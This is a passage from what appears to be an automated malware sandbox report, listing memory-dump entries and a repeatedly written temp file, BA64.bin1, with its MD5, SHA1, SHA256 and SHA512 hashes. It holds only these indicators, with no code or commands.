| SHA256 | 793271214cb58ff61d8165d2d0b3db1a0d2b9436866b46525f46478f74dc61a2 |
| SHA512 | 3b851ca2925b2017808af930096769538634120612237a0e191ec254a32c9803e14505dc728cf54a39842acf41728f62ed9d206ed5739d42b85b8edf5bec3d31 |
memory/2484-207-0x0000000000000000-mapping.dmp
memory/3800-208-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\BA64.bin1
| MD5 | 8ce44843ae5914e2603ecb50fcff59b4 |
| SHA1 | 3a6345d9566cc174526e7d020d1fa1ff8ac15c3c |
| SHA256 | fd4ac27dff473a9e653bc7bbc84b18df090aa273c1f3dd2df4d54eb3b3b84dfd |
| SHA512 | 048870ef115f646580ae68b920d998e59d0ff3ec59a7f84ee167c5314185687fa526524d0b936c40a38b40645c97f42188e699a1bf7368852b3bb2ee4d5395be |
memory/1016-210-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\BA64.bin1
| MD5 | 8ce44843ae5914e2603ecb50fcff59b4 |
| SHA1 | 3a6345d9566cc174526e7d020d1fa1ff8ac15c3c |
| SHA256 | fd4ac27dff473a9e653bc7bbc84b18df090aa273c1f3dd2df4d54eb3b3b84dfd |
| SHA512 | 048870ef115f646580ae68b920d998e59d0ff3ec59a7f84ee167c5314185687fa526524d0b936c40a38b40645c97f42188e699a1bf7368852b3bb2ee4d5395be |
memory/484-212-0x0000000000000000-mapping.dmp
memory/700-213-0x0000000000000000-mapping.dmp
memory/3620-214-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\BA64.bin1
| MD5 | 756f9aa8d75fee36e04299538a327de3 |
| SHA1 | 911b62a984eb4c4190032a0148c11a24a52b56f9 |
| SHA256 | 870c7543adc861eae31c474069d2d6d675e21d4c44ec309ec59f530f85286bb4 |
| SHA512 | fe3e855a82c3151e0ced9ae7f48747c462bbf7477d7a9b72a814de602c4db910b7c964ed3ce8c11ab5ac8ec6fa89df2fb0e9da889b126c2c4144d97ac9873964 |
memory/4168-216-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\BA64.bin1
| MD5 | 756f9aa8d75fee36e04299538a327de3 |
| SHA1 | 911b62a984eb4c4190032a0148c11a24a52b56f9 |
| SHA256 | 870c7543adc861eae31c474069d2d6d675e21d4c44ec309ec59f530f85286bb4 |
| SHA512 | fe3e855a82c3151e0ced9ae7f48747c462bbf7477d7a9b72a814de602c4db910b7c964ed3ce8c11ab5ac8ec6fa89df2fb0e9da889b126c2c4144d97ac9873964 |
memory/2380-218-0x0000000000000000-mapping.dmp
memory/4772-219-0x0000000000000000-mapping.dmp
memory/3196-220-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\BA64.bin1
| MD5 | 5683e4c5651bbe4e85f320aa8263cccc |
| SHA1 | 23cc43ab8666c3db6c020a2469ad854224fe0e43 |
| SHA256 | 9e4d2a8b5c57d9aad2e9ba9f9d49d2400e122cfdebe92b453d48acc4246651e9 |
| SHA512 | c7d026d873638b97262445a6d02d91c58673f0c97c029d80e4255fe961f02f04b801adf5e1fdb60ef914cf8bc8a339cbbe1cc01c6ab9b6e00223b58480f5149f |
memory/2428-222-0x0000000000000000-mapping.dmp
memory/1108-223-0x0000000000000000-mapping.dmp
memory/4624-224-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\BA64.bin1
| MD5 | 7e9b3b34ec9630f8cb76351e7f0a3e94 |
| SHA1 | 31ee51742956b7e6a4bc6102332afb5f89e0badf |
| SHA256 | 4632bf2a753cd858029a524ddd0ec3a7dc9935c1b7bce81dee3eb781e1aa3091 |
| SHA512 | 0ca1acea89380f81a200fd8702572887efbd684cb55b8c35343083b13fd0044c908d7f674e0d024a53b4f61be8c00fa93891ab638c81d3c1dafeed8efeb26102 |
memory/2172-226-0x0000000000000000-mapping.dmp
memory/224-227-0x0000000000000000-mapping.dmp
memory/1932-228-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\BA64.bin1
| MD5 | ab5ad908b9a63b1f754a9f541f63ab92 |
| SHA1 | 0d241c8e8cab134e28fec06e57ee6d9886aac4cc |
| SHA256 | 4a586dd458d25210bbe2e370a231e9a314fb05a7032d71531b2c74fc0c3eeac8 |
| SHA512 | 15d4d87ac03a8f45c67c10f09ae0652260f4781047e43fa37d52a3366b60423527ba50c0b25dd637696ec7f00eead1de69f87733478c6520cd7b9c0c02475ebd |
memory/1540-230-0x0000000000000000-mapping.dmp
memory/3184-231-0x0000000000000000-mapping.dmp
memory/3080-232-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\BA64.bin1
| MD5 | 09ecf16c7381965a345043970bfe3fe4 |
| SHA1 | 51cf1ea3f6d351d31f00c3d29dde9905ff862cdb |
| SHA256 | 11abb64b97b1df51ee65f0d08db7bdcaa9bbd61766b110aa897aa0b388b93673 |
| SHA512 | 61181616d66b8fc0aa5bac747a6934686515071606799e92ba0e9a90a409f024ba6fac5edaf91bc5466fc5c138374df6c38b9e85f777f405ed2c8bb0f228f07b |
C:\Users\Admin\AppData\Local\Temp\BA64.bin
| MD5 | 09ecf16c7381965a345043970bfe3fe4 |
| SHA1 | 51cf1ea3f6d351d31f00c3d29dde9905ff862cdb |
| SHA256 | 11abb64b97b1df51ee65f0d08db7bdcaa9bbd61766b110aa897aa0b388b93673 |
| SHA512 | 61181616d66b8fc0aa5bac747a6934686515071606799e92ba0e9a90a409f024ba6fac5edaf91bc5466fc5c138374df6c38b9e85f777f405ed2c8bb0f228f07b |